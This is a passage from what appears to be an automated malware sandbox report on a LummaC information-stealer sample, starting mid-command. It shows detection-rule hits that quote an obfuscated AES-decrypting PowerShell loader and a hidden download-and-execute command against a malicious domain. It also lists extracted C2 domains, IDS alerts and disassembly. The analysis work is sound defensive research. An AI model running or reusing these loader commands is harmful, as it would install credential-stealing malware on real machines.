4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2996, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/sin
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2996, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/sin
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2996, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/sin
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1", ProcessId: 2800, ProcessName: powershell.exe
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B3749
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4420, ProcessName: svchost.exe

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2996, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/sin
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-25T15:10:32.806882+010020283713Unknown Traffic192.168.2.449823104.21.112.1443TCP
                2024-12-25T15:10:34.796392+010020283713Unknown Traffic192.168.2.449825104.21.112.1443TCP
                2024-12-25T15:10:37.049964+010020283713Unknown Traffic192.168.2.449831104.21.112.1443TCP
                2024-12-25T15:10:39.243565+010020283713Unknown Traffic192.168.2.449837104.21.112.1443TCP
                2024-12-25T15:10:41.307454+010020283713Unknown Traffic192.168.2.449843104.21.112.1443TCP
                2024-12-25T15:10:43.671394+010020283713Unknown Traffic192.168.2.449854104.21.112.1443TCP
                2024-12-25T15:10:45.928030+010020283713Unknown Traffic192.168.2.449860104.21.112.1443TCP
                2024-12-25T15:10:49.426528+010020283713Unknown Traffic192.168.2.449866104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-25T15:10:33.534400+010020546531A Network Trojan was detected192.168.2.449823104.21.112.1443TCP
                2024-12-25T15:10:35.555381+010020546531A Network Trojan was detected192.168.2.449825104.21.112.1443TCP
                2024-12-25T15:10:50.190773+010020546531A Network Trojan was detected192.168.2.449866104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-25T15:10:33.534400+010020498361A Network Trojan was detected192.168.2.449823104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-25T15:10:35.555381+010020498121A Network Trojan was detected192.168.2.449825104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-25T15:10:40.011889+010020480941Malware Command and Control Activity Detected192.168.2.449837104.21.112.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 12.2.powershell.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "hushedocenahu.click", "crosshuaht.lat", "rapeflowwj.lat", "grannyejh.lat", "energyaffai.lat", "sustainskelet.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "yJEcaG--singl7"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: rapeflowwj.lat
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: crosshuaht.lat
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: sustainskelet.lat
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: aspecteirs.lat
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: energyaffai.lat
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: necklacebudi.lat
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: discokeyus.lat
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: grannyejh.lat
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: hushedocenahu.click
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: Workgroup: -
                Source: 12.2.powershell.exe.400000.0.raw.unpackString decryptor: yJEcaG--singl7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00415799 CryptUnprotectData,12_2_00415799
                Source: unknownHTTPS traffic detected: 104.21.38.253:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49823 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49825 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49831 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49837 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49843 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49854 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49860 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49866 version: TLS 1.2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077BEC48h6_2_077BEA18
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077BEC48h6_2_077BEA08
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077BE0D5h6_2_077BE050
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077C12B6h6_2_077C1180
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077C12B6h6_2_077C14AD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077C12B6h6_2_077C1270
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077C12B6h6_2_077CCA04
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 077C12B6h6_2_077C1170
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]12_2_00423860
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al12_2_0042DA53
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax12_2_004096C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebp+00h], ax12_2_004096C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]12_2_0043C767
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax12_2_00415799
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax12_2_00415799
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax12_2_0042984F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx12_2_00438810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh12_2_00438810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh12_2_00438810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then test eax, eax12_2_00438810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al12_2_0041682D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]12_2_0041682D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]12_2_0041682D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], bp12_2_0041D83A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push C0BFD6CCh12_2_00423086
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push C0BFD6CCh12_2_00423086
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]12_2_0042B170
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]12_2_004179C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h12_2_0043B1D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax12_2_0043B1D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx12_2_004291DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]12_2_004291DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax12_2_00405990
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebp, eax12_2_00405990
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, esi12_2_00422190
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], cx12_2_00422190
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h12_2_00422190
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]12_2_00416263
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]12_2_00415220
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push esi12_2_00427AD3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], ax12_2_0041B2E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push ebx12_2_0043CA93
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx12_2_0041CB40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx12_2_0041CB40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx12_2_00428B61
